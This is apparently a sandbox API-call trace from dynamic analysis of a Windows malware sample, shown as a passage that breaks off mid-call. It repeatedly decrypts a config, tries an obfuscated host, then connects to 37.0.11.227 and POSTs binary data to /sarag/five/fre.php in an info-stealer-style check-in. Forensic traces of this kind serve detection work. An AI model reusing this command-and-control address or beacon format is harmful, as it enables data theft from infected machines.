LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.545] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.545] GetProcessHeap () returned 0x690000 [0276.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0276.545] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.545] GetProcessHeap () returned 0x690000 [0276.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0276.546] GetProcessHeap () returned 0x690000 [0276.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.546] GetProcessHeap () returned 0x690000 [0276.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0276.546] GetProcessHeap () returned 0x690000 [0276.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0276.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0276.564] GetProcessHeap () returned 0x690000 [0276.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0276.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.565] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.566] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.567] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.567] GetProcessHeap () returned 0x690000 [0276.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0276.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.569] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0276.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.570] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.571] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0276.571] GetProcessHeap () returned 0x690000 [0276.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.572] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0276.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.574] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0276.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.576] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0276.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.589] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0276.589] GetProcessHeap () returned 0x690000 [0276.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0276.589] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0276.589] GetProcessHeap () returned 0x690000 [0276.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0276.589] socket (af=2, type=1, protocol=6) returned 0x874 [0276.590] connect (s=0x874, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0276.617] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0276.617] GetProcessHeap () returned 0x690000 [0276.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0276.617] GetProcessHeap () returned 0x690000 [0276.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0276.619] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.621] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.621] GetProcessHeap () returned 0x690000 [0276.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0276.621] GetProcessHeap () returned 0x690000 [0276.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.621] GetProcessHeap () returned 0x690000 [0276.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0276.621] GetProcessHeap () returned 0x690000 [0276.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0276.623] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.624] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.624] GetProcessHeap () returned 0x690000 [0276.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0276.624] GetProcessHeap () returned 0x690000 [0276.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.624] send (s=0x874, buf=0x6ad508*, len=242, flags=0) returned 242 [0276.625] send (s=0x874, buf=0x6aba40*, len=159, flags=0) returned 159 [0276.625] GetProcessHeap () returned 0x690000 [0276.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0276.625] recv (in: s=0x874, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0276.705] GetProcessHeap () returned 0x690000 [0276.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0276.706] GetProcessHeap () returned 0x690000 [0276.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0276.706] GetProcessHeap () returned 0x690000 [0276.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0276.706] GetProcessHeap () returned 0x690000 [0276.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0276.707] closesocket (s=0x874) returned 0 [0276.707] GetProcessHeap () returned 0x690000 [0276.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0276.707] GetProcessHeap () returned 0x690000 [0276.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.708] GetProcessHeap () returned 0x690000 [0276.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0276.708] GetProcessHeap () returned 0x690000 [0276.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0276.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1630) returned 0x874 [0276.711] Sleep (dwMilliseconds=0xea60) [0276.716] GetProcessHeap () returned 0x690000 [0276.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0276.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.717] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0276.728] GetProcessHeap () returned 0x690000 [0276.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0276.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.730] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0276.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.741] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.768] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.768] GetProcessHeap () returned 0x690000 [0276.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0276.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.769] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0276.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.773] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0276.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.777] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0276.777] GetProcessHeap () returned 0x690000 [0276.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.778] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.779] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.780] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.781] GetProcessHeap () returned 0x690000 [0276.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0276.781] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.782] GetProcessHeap () returned 0x690000 [0276.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0276.782] GetProcessHeap () returned 0x690000 [0276.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.783] GetProcessHeap () returned 0x690000 [0276.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0276.783] GetProcessHeap () returned 0x690000 [0276.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0276.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.784] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0276.797] GetProcessHeap () returned 0x690000 [0276.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0276.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.798] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.799] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.800] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.800] GetProcessHeap () returned 0x690000 [0276.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0276.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.804] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0276.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.805] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.808] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0276.808] GetProcessHeap () returned 0x690000 [0276.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.808] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0276.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.809] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0276.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.810] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0276.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.811] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0276.811] GetProcessHeap () returned 0x690000 [0276.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0276.811] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0276.811] GetProcessHeap () returned 0x690000 [0276.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0276.811] socket (af=2, type=1, protocol=6) returned 0x878 [0276.812] connect (s=0x878, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0276.841] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0276.841] GetProcessHeap () returned 0x690000 [0276.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0276.841] GetProcessHeap () returned 0x690000 [0276.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0276.842] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.843] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.843] GetProcessHeap () returned 0x690000 [0276.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0276.843] GetProcessHeap () returned 0x690000 [0276.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.844] GetProcessHeap () returned 0x690000 [0276.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0276.844] GetProcessHeap () returned 0x690000 [0276.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0276.844] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.845] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.845] GetProcessHeap () returned 0x690000 [0276.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0276.845] GetProcessHeap () returned 0x690000 [0276.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.846] send (s=0x878, buf=0x6ad508*, len=242, flags=0) returned 242 [0276.846] send (s=0x878, buf=0x6aba40*, len=159, flags=0) returned 159 [0276.846] GetProcessHeap () returned 0x690000 [0276.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0276.846] recv (in: s=0x878, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0276.918] GetProcessHeap () returned 0x690000 [0276.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0276.919] GetProcessHeap () returned 0x690000 [0276.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0276.919] GetProcessHeap () returned 0x690000 [0276.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0276.919] GetProcessHeap () returned 0x690000 [0276.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0276.919] closesocket (s=0x878) returned 0 [0276.920] GetProcessHeap () returned 0x690000 [0276.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0276.920] GetProcessHeap () returned 0x690000 [0276.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.920] GetProcessHeap () returned 0x690000 [0276.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0276.921] GetProcessHeap () returned 0x690000 [0276.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0276.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1634) returned 0x878 [0276.922] Sleep (dwMilliseconds=0xea60) [0276.923] GetProcessHeap () returned 0x690000 [0276.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0276.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.924] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0276.936] GetProcessHeap () returned 0x690000 [0276.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0276.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.939] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.940] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.940] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.940] GetProcessHeap () returned 0x690000 [0276.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0276.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.976] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0276.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.977] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.978] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0276.978] GetProcessHeap () returned 0x690000 [0276.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.979] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.980] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.983] GetProcessHeap () returned 0x690000 [0276.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0276.984] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, 